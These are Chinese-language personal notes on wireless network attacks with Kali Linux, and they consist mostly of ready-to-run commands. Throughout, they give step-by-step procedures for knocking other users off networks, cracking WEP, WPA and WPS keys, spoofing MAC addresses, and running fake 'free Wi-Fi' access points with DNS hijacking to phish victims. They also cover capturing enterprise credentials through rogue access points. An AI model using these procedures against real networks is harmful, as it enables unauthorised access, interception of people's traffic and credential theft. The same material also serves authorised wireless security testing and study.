kali 无线渗透笔记
(都是实操的东西,没有知识点)
HTTP://ETUORLASLS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/
wlan学习网站
service network-manager stop/start
关服务
ifconfig
看运行的设备
ifconfig -a
看所有设备
iwconfig
看无线设备
airmon-ng start wlan0
打开监听,
airmon-ng start wlan0 1
固定信道打开监听,
iwlist wlan0mon channel
看信道,并显示自己的信道
airmon-ng
airmon-ng stop wlan0
关闭
ifconfig wlan0 up
ifconfig wlan0mon up
打开监听
airmon-ng check
airmon-ng check kill
杀进程
airodump-ng wlan0mon
监听所有附近的设备
airodump-ng wlan0mon -c 1
抓取指定信道(信道可能有交叉)
airodump-ng wlan0mon -c 1 --bssid 58:60:5F:3B:3A:70
抓指定信道的指定ip
airodump-ng wlan0mon -c 1 --bssid 58:60:5F:3B:3A:70 -w flag1
保存文件
文件后缀作用
.cap 数据包,可用wireshark查看
airodump-ng wlan0mon -c 1 --bssid 58:60:5F:3B:3A:70 -w flag1.cap
抓指定文件名,也可侦听把-w去掉
airodump-ng wlan0mon -c 1 --bssid 58:60:5F:3B:3A:70 -w flag1.cap --ivs
指定文件指定信息
bssid:ip地址 pwr:信号强度,越接近0越大,-1可能太弱,或者侦听不到
rxq:成功接收数据的百分比 beacons:接受到的数目
#data:数据侦的数量 #/s:最近10秒的数量
CH:信道号,信道重叠问题 MB:AP支持的最大速率
ENC:加密技术 CIPHEP:加密套件:CCMP等
ESSID:无线网络名称,可能为空,即隐藏起来了
airodump从probe和association request 若有人连就可以发现隐藏名字\
station:sta的mac地址即连的设备 -1一般所长度太远了
lost:最近10秒丢包数量
feames:设备发送数据包的数量
probe:探测的essid
aireplay-ng
aireplay-ng --help
aireplay-ng -9 wlan0mon
查看是否可以注入数据包
aireplay-ng -9 wlan0mon -e KiFi(名字) -a 0.0.0.0.(ip地址)
指定ip地址
aireplay-ng -9 wlan0mon -e KiFi(名字) -a 0.0.0.0.(ip地址)
如果两块网卡可以精细检测
也即
aireplay-ng -9 -i wlan0mon wlan1mon
MAC绑定:
╋━━━━━━━━━━━╋
┃ MAC地址绑定攻击
╋━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━╋
┃MAC绑定
┃管理员误以为MAC绑定是一种安全机制
┃限制可以关联的客户端MAC地址
┃
┃
┃准备AP
┃ AP基本配置
┃ Open认证
┃ 开启无线过滤
┃修改MAC地址绕过过滤
╋━━━━━━━━━━━━━━━━━╋
也即限制连的电脑和手机
想要连的话就把自己的ip改为别人连的ip地址就可以连了
命令上面有,改ip地址
但可能会丢包,信号不好,同时连的话
WEP加密攻击:
(一般都不用,部分企业可能会用)
╋━━━━━━━━━━━╋
┃ WEP攻击
╋━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WEP共享密钥破解
┃WEP密码破解原理
┃ IV并非完全随机
┃ 每224个包可能出现一次IV重用
┃ 收集大量IV之后找到相同IV及其对应密码文,分析得出共享密码
┃ARP回包中包含IV
┃IV足够多的情况下,任何复杂程度的wep密码都可以被破解
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@kali:~# airodump-ng wlan2mon
root@kali:~# airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan2mon
╋━━━━━━━━━━━━━━━━╋
┃WEP共享密钥破解
┃启动monitor模式
┃启动抓包并保存抓包
┃Deauthentication抓包XOR文件
┃利用XOR文件与AP建立关联
┃执行ARP重放
┃Deauthenticiation触发ARP数据包
┃收集足够DATA之后破解密码
╋━━━━━━━━━━━━━━━━╋
IV不是随机,包抓多了,也即不断重新连接,就可以破解
一个iv一个密文
1:monitor模式
2:抓包并保存
3:deauthentication 抓取xor文件
4:xor文件与ap连接
5:arp重放
6:deauthentication 触发数据包
7:包多了就可以破解了
1:启动抓包
2:伪造身份认证
aireplay-ng -1(包的注入方式) 60(sj) -e hifi(名字) -y wep-密文密钥流 -a ap的mac地址 -h 自己的mac地址 wlan0mon
注入身份认证建立关联
3:
获得密文必须要重新连接才能抓到密文
但是自己可以用deauthentication 打断别人,然后再抓
eg:
aireplay-ng -0(攻击方法) 2(攻击次数) -a AP也即路由器热点的地址 -c 连的设备的地址 wlan0mon
pwr一般为被打为0
把别人打掉线差不多就这意思
4,5,6
aireplay-ng -3(攻击方法) -b APd的mac地址 -h 自己的wlan0mon地址 wlan0mon
aireplay-ng -0(攻击方法) 2(攻击次数) -a AP也即路由器热点的地址 -c 连的设备的地址 wlan0mon
最好150万数据效率高
先打再抓
抓ack
7,后把保存的数据破解
aircrack-ng 文件名
破解
广泛攻击:
aireplay -0 1(0的话所一直发包) kill -a APmac地址 -c (不指定的地址的话会广泛攻击所有设备)客户地址 wlan0mon
MAC地址:eg: 0C:D8:6C:4C:22:CE
前提:信道要一样,不然不行,所有开始设置信道非常重要
WPA攻击:
╋━━━━━━━━━━━━━━╋
┃WPA PSK攻击
┃只有一种密码破解方法
┃ WPA不存在WEP的弱点
┃只能暴力破解
┃ CPU资源
┃ 时间
┃ 字典质量
┃ 网上共享的字典
┃ 泄露密码
┃ 地区电话号码段
┃ Crunch生成字典
┃ kali中自带的字典文件
╋━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━╋
┃WPA PSK攻击
┃PSK破解过程
┃ 启动monitor
┃ 开始抓包并保存
┃ Deauthentication攻击获取4步握手信息
┃ 使用字典暴力破解
╋━━━━━━━━━━━━━━━━━━━━╋
只能暴力破解
破解密码文件:
aircrack-ng -w 密码字典(/usr/share/john/password.lst ) 抓取包的文件名(wpa-01.cap)
字典目录
/usr/share/john/password.lst
/usr/share/john/password.lst |wc -l
看字典长度
密码字典:
/usr/share/wordlists/
没有设备AP连的时候:
伪造AP抓取前面四次握手的两个包
probe 可能会泄漏AP连的以前的wlan名字
生成网卡,伪造,钓鱼wlan
airbase-ng --essid 323 (wlan名字) -c 11(信道) wlan0mon
用各种方式创建wlan
airbase-ng --help
1:open方式
airbase-ng --essid 323 (wlan名字) -c 11(信道) wlan0mon
2:WPA1
airbase-ng --essid 323 (wlan名字) -c 11(信道) -z 1 wlan0mon
3:WPA2
airbase-ng --essid 323 (wlan名字) -c 11(信道) -Z wlan0mon()wlan名字为泄露的probe,也即可以通过这样来抓取前两个包,进而破解泄漏的probe(可能用户以前连的别人的历史wlan)
1:伪造wlan(从泄漏的地方看)
2:手机可能会连这个wlan,所以就可以抓到前两个数据包,
3:airbase-ng --essid 323 (wlan名字) -c 11(信道) wlan0mon -w wpa
保存下来,
4:破解密码文件:
aircrack-ng -w 密码字典(/usr/share/john/password.lst ) 抓取包的文件名(wpa-01.cap)
4种工具:提高破解效率
1:airolib
先生成PMK(非常消耗资源)
也即先算哈希值,然后再输入数据从中进行对应,然后再比较输出密码。
ps:和查MD5差不多
缺点,改个名字计算出的哈希值就失效了
步骤:
命令:
1:先创建一个文件把wlan名字存到文件中:echo wlan(名字) > essid.txt
2: airolib-ng db --import essid essid.txt 创建数据库导入essid
3: airolib-ng db --stats查看数据库状态
4: airolib-ng db --import passwd(password) /usr/share/john/password.lst(密码文件)
自动剔除没用数据
5: airolib-ng db -batch
生成PMK
6:aircrack-ng db (生成PMK文件名)
2:JTR破解密码
支持规则扩展密码字典
步骤
1:vim /etcjohn/john,conf
2:搜索List.Rules:Wordlist
在最下面修改规则
$[0-9]$[0-9]$[0-9]$[0-9]
在文本最后面会添加4个数字
4:john --wordlist=文件名 --rules --stdout
输出规则文本
5:这个可以节省大量空间,因为所动态的密码规则
6:破解密码
john --wordlist=文件名 --rules --stdout | aircrack-ng -e wlan名 -w 数据包名
3:cowpatty 破解密码
COWPATTY破解密码
1:WPA密码通用破解工具
使用密码字典
cowpatty -r wpa.cap(文件名) -f password.lst(密码字典文件) -s kifi(wlan名)
2:使用彩虹表(PMK)
genpmk -f password.lst(密码文件) -d pmkhash -s kifi(wlan名) 先计算哈希zhi,生成pmkhash文件
cowpatty -r wpa.cap(数据包文件名) -d pmkhash -s kifi(wlan名) 再用数据包来比较哈希zhi
4:PYRIT破解密码
PYRIT破解密码
与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度
独有的优势
除CPU之外pyrit可以运行GPU的强大运算能力加速生成PMK (相当于多了个CPU处理器)
本身支持抓包获取四步握手过程,无需用Airdum抓包
也支持传统的读取airodump抓包获取四步握手的方式
只抓取WAP四次握手过程包
1:分析数据包:
pyrit -r wlan0mon -o wpapyrit.cap(数据包文件名) stripLive(把不需要的数据包去掉)
只抓取WAP四次握手过程包
2:分析数据包:
pyrit -r wpapyrit.cap analyze
3:从airodump抓包导入并筛选,如果用airodump抓的包那么需要转换格式
也即这样
pyrit -r wpa.cap(抓的原数据包) -o wpapyrit.cap strip(剔除无用的数据包)
4:
PYRIT破解密码
(1):使用密码字典直接破解
pyrit -r wpaprit.cap(文件名) -i password.lst(密码文件名) -b <AP MAC>(AP的essid,在分析结果里面有,就算AP地址,前面讲过) attack passthrough
分析结果:
pyrit -r wpaprit.cap(文件名)analyze
(2):数据库模式破解 ,也可以连数据库,这里用本地数据库
默认使用基于文件的数据库,支持连接SQL数据库,将计算的PMK存入数据库
查看默认数据库状态:pyrit eval
a:导入密码字典:pyrit -i password.lst(字典文件名) import password (剔除了不合规的密码)
b:制定ESSID:pyrit -e kifi(wlan名) create_essid
c:计算PMK:pyrit batch (发挥GPU计算能力)虚拟机没有GPU
d:破解密码:pyrit -r wpapyrit.cap(数据库名) -b <AP MAC>(AP地址) attack_db
WPS攻击:
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
┃WPS是WiFi联盟2006年开放的一项技术
┃ 通过PIN码来简化无线接入的操作,无需记住PSK
┃ 路由器和网卡各按一个按钮就能接入无线
┃ PIN码是分为前后各4位的2段共8位数字
┃安全漏洞
┃ 2011年被发现安全涉及漏洞
┃ 接入发起方可以根据路由器的返回信息判断前4位是否正确
┃ 而PIN码的后4位只有1000中定义的组合(最后一位是checksum)
┃ 所以全部穷举破解只需要11000次尝试
┃ PSK: 218,340,105,584,896
┃ 标准本身没有设计锁定机制,目前多个厂商已实现锁定机制(也即每分钟发的次数会被限制)
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
┃包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
┃即使在WEB节目中有关闭WPS,配置也不会生效
┃攻击难度相对较低,防御却十分困难
┃一般可在4-10小时爆破密码 (一定可以破解)
┃ PSK
┃用计算器直接算出PIN(16进制)
┃ C83A35
┃ 00B00C
╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
┃启动侦听模式后,发现支持WPS的AP
┃ wash -i wlan0mon
┃ airodump-ng wlan0mon --wps
┃爆破PIN码
┃ reaver -i wlan0mon -b <AP mac> -vv
┃秒破PIN码
┃ reaver -i wlan0mon -b <AP mac> -c (固定信道) -vv -K 1 (针对厂家漏洞执行)
┃ pixiewps
|
┃ 只适用于固定厂商的芯片,成功率很低
┃reaver -i wlan0mon -b <AP mac> -vv -p 88888888
|指定pin码
╋━━━━━━━━━━━━━━━━━━━━━━━╋
注意如果有锁定的话就需要限速
如果被锁定的话就可以伪造耗尽AP让他重启,不过资源耗的太多,浪费时间
工具:wifite
可以自动启动监听模式
直接输入:wifite
Ctrl+C 输入要攻击设备对应的数字就可以攻击了
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃FAKE AUTHENTICATION
┃WEP破解全部需要首先伪造认证,以便于AP进行正常通信
┃不产生ARP数据包
┃aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>
┃aireplay-ng -1 60 -0 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC><interface>
┃ 每60000秒发送reauthenticiation
┃ -o 1 每次身份认证只发一组认证数据
┃ -q 10 每10秒发keep-live帧
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━╋
┃FAKE AUTHENTICATION
┃某些AP验证客户端MAC地址OUI (前三个字节)
┃MAC地址过滤
┃Denied (Code 1) is WPA in use
┃ WPA/WPA2不支持Fake authentication
┃使用真实MAC地址
┃物理靠近AP
┃侦听信道正确
╋━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━╋
┃FAKE AUTHENTICATION排错
┃物理足够接近被攻击者
┃与被攻击者使用相同无线标准b、n、g
┃客户端可能拒绝广播帧,建议制定客户端
╋━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃ARP重放
┃侦听正常的ARP包并重放给AP
┃AP回包中包含大量弱IV
┃
┃
┃aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name>
┃ -h合法客户端/供给者MAC
┃Airodump-ng data字段
┃ 64bit密钥: 25万
┃ 128bit密钥: 150万
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━╋
┃WEP破解
┃Airecrack-ng wep.cap
╋━━━━━━━━━━━╋
wlan攻击:手动
注意网桥模式设置
╋━━━━━━━━━━━━╋
┃EVIL TWIN AP / ROGUE AP
┃ 其他工具
╋━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
┃蹭网与被蹭网
┃北上广20%的公共场所无线网络是伪造的
╋━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
|1:伪造AP
┃airbase-ng -a <AP mac>(伪造AP的地址) --essid "kifi"(取名字,比如:KFC-Free) -c 11 wlan2mon
|kali配置dhcp服务就可以为连接的手机分配ip,就可以让手机上网
|https://blog.csdn.net/daxueba/article/details/85089801
┃apt-get install bridge-Utils 安装网桥
┃brctl addbr(命名) bridge
┃brctl addif Wifi-Bridge eth0(真实网卡)
┃brctl addif Wifi-Bridge at0(伪造网卡)
┃ifconfig eth0 0.0.0.0 up
┃ifconfig at0 0.0.0.0 up
┃ifconfig bridge 192.168.1.10 up (给桥接接口ip地址)
┃route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1(自己的网关)
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP)
|启动ip转发
┃echo 1 > /proc/sys/net/ipv4/ip_forward
|把0改为1
┃dnspoof -i bridge -f dnsspoof.hosts
┃ /usr/share/dnsiff/dnsspoof.hosts
┃apachet2ctl start
╋━━━━━━━━━━━━━━━━━━━╋
root@kali:~# vi /proc/sys/net/ipv4/ip_forward
不让修改数据!
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
把0改成1,就开启了路由功能!
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
DNS劫持
root@kali:~# dnspoof -i bridge -f dnsspoof.hosts
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@kali:~# cat /usr/share/dnsiff/dnsspoof.hosts
root@kali:~# vi host
root@kali:~# dnsspoof -i bridge(欺骗接口) -f host(欺骗域名)也即只要访问域名就会转换到自己的欺骗接口
vi host
127.0.0.1 *.baidu.com
所有的baidu.com的域名相关就会转换到自己的域名中
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]
root@kali:~# apache(启动本机阿帕奇服务,即可以伪造自己的web页面)
apache2 apache2ctl apachectl apache-users
root@kali:~# apachet2ctl start
AH00558: apache2: Coule not reliably determine the Server's fully qualified domain name, using 127.0.1.l.Set the 'ServerName' directive globally to suppress this message
root@kali:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2
wlan攻击:工具篇:
自动化伪造AP
工具集成
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃EVIL TWIN AP / ROGUE AP
┃3vilTwinAttacker
┃ git clone https://github.com/P0cL4bs/3vilTwinAttacker.git
| 下载
┃ cd 3vilTwinAttacker
| 到工具
┃ chmod +x installer.sh
┃ ./installer.sh --install
| . ./ installer.sh --install
┃
| 直接输入 3vilTwin-Attacker,所有配置都会自动到完成
┃
┃iptables
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
WPA企业渗透
╋━━━━━━━━━━━━━━━╋
┃WPA企业
┃hostapd-wpe
|伪造AP
┃ 取代FreeRADIUS-wpe
┃ EAP-FAST/MSCHAPv2(Phase 0)
┃ PEAP/MSCHAPv2
┃ EAP-TTLS/MSCHAPv2
┃ EAP-TTLS/MSCHAPv2
┃ EAP-TTLS/MSCHAP
┃ EAP-TTLS/CHAP
┃ EAP-TTLS/PAP
╋━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPA企业
┃安装
┃ git clone https://github.com/OpenSecurityRessarch/hostapd-wpe
┃ apt-get install libssl-dev libnl-dev
┃ lib11、libnl-dev包不在kali2.0的官方库中
┃ wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-dev 1.1-7 amd64.deb
┃ wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl1 1.1-7 amd64.denb
┃ dpkg -i libnl1_1.1_7_amd64.deb
┃ dpkg -i libnl-dev1_1.1_7_amd64.deb
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPA企业
┃wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
┃tar -zxf hostapd-2.2.tar.gz
┃cd hostapd-2.2
┃patch -p 1 < ../hostapd-wpe/hostapd-wpe.patch
┃cd hostapd
┃make
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━╋
┃WPA企业
┃生成证书
┃ cd ../../hostapd-wpe/certs
┃ ./bootstrap
┃service network-manager stop
┃airmon-ng check kill
┃映射无线网卡
┃ifconfig wlan2 up
┃启动伪造AP
┃ cd ../../hostapd-2.2/hostapd
┃ ./hostapd-wpe hostapd-wpe.conf
╋━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━╋
┃AIRRACK-NG SUITE
┃ 其他工具
╋━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃AIRDECAP-NG
┃去除802.11头
┃ airdecap-ng -b <AP MAC>(地址) 1.pcap(数据)
┃解密WEP加密数据
┃ airdecap-ng -w <WEP key>(密码文件) -b <AP MAC> 1.pcap(也即伪造抓取,前面有讲)
┃ 必须有与AP建立关联关系
┃解密WPA加密数据
| 知道密码就可以解密抓的包的数据
┃ airdecap-ng -e kifi -p <PSK>(密码) -b <AP MAC>(MAC地址) 1.pcap
┃ 抓包文件中必须包含4步握手信息,否则无解
╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━╋
┃AIRSERV-NG
┃通过网络提供无线网卡服务器
┃ 某些网卡不支持客户点/服务器模式
┃启动无线侦听
┃服务器端
┃ airserv-ng -p 3333(监听端口) -d wlan2mon
|netstat -pantu | grep 3333
┃客户端
┃ airodump-ng 192.168.1.1:3333 (侦听的ip意思所可以侦听以外的端口)
┃某些防火墙会影响C/S间的通信
╋━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━╋
┃AIRTUN-NG
|隧道接口入侵
┃无线入侵检测wIDS
|保护方所用,用于解密包,给IDS分析,看有没有入侵
┃ 无线密码和BSSID
┃ 需要获取握手信息
┃中继和重放
|就是多一个网卡,扩大物理距离
┃ Repeate(时事抓放)/Replay(可以储存)
╋━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃AIRTUN-NG
┃wIDS
┃ WEP: airtun-ng -a <AP MAC>(AP地址) -w SKA(无线密码) wlan0mon
┃ WPA: airtun-ng -a <AP MAC>(AP地址) -p PSK(无线密码) -e kifi(wlan名字) wlan0mon(侦听并创建接口)
| (必须要有握手,即需要连接方重连,就打他让它重连)
| ifconfig at0 up
| driftnet -i at0(侦听图片,一般可能会有丢失)
| dsniff -i at0
┃ snort分析数据包,看是否有入侵(需要安装)
┃ 四步握手
┃ 理论上支持多AP的wIDS,但2个AP以上时可靠性会下降
┃ WPA: airtun-ng -a <AP MAC> -p PSK -e kifi1 wlan2mon
┃ ifconfig at1 up
┃ 多AP不同信道时airodump -c 1,11 wlan2mon
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃AIRTUN-NG
┃Repeate
┃ WDS/Bridge
┃ 扩展无线侦听的距离
┃ 要求两块网卡都置入monitor模式
┃ airtun-ng -a <AP MAC>(侦听的AP) --repeat --bssid <AP MAC>(过虑抓包的网卡的AP) -i wlan0mon(收包的网卡) wlan2mon(发包的网卡)
┃ wlan0mon: 收包的网卡
┃ wlan2mon: 发包的网卡
┃ -a: 发包的源地址
┃ --bssid: 过滤只发指定源地址的包(可选)
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃AIRTUN-NG
┃Replay
┃ 将抓取的CAP文件重放到指定网卡
┃ airtun-ng -a <Source MAC> -r 1.cap <interface>
╋━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━╋
┃其他工具
┃besside-ng
|besside-ng --help
|man besside-ng
|wpa.darkircop.org(内含字典)
|-b <victim mac> : Victim BSSID(指定AP发起WPA的攻击,也即不需要自己去打网络,会自动打)
| -R <victim ap regex> : Victim ESSID regex
| -s <WPA server> : Upload wpa.cap for cracking(发送四次握手自动上传云数据库,自动破解)
| -c <chan> : chanlock
| -p <pps> : flood rate
| -W : WPA only
| -v : verbose, -vv for more, etc.
| -h : This help screen
|
┃fern-wifi-cracker(图形化界面)
╋━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━╋
┃无线侦查
|物理走动收集信息,结合GPS模块,生成特殊文件,再导入谷歌地球,和wlan万能钥匙差不多
┃kismet (直接输入就可以了)
┃ kismet*.nettxt
┃ kismet*.pcapdump
┃
┃GPS设备映射
┃gpsd -n -N -D4/dev/ttyUSBO
┃giskismet -x Kismet-*.netxml
┃giskismet -q "select * from wireless" -o gps.kml
╋━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃无线侦查
┃Google地球
┃ http://dl.google.com/dl/earth/client/current/google-earth-stable current amd64.deb
┃dpkg -i google-earth64.deb
┃apt-get -f install
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
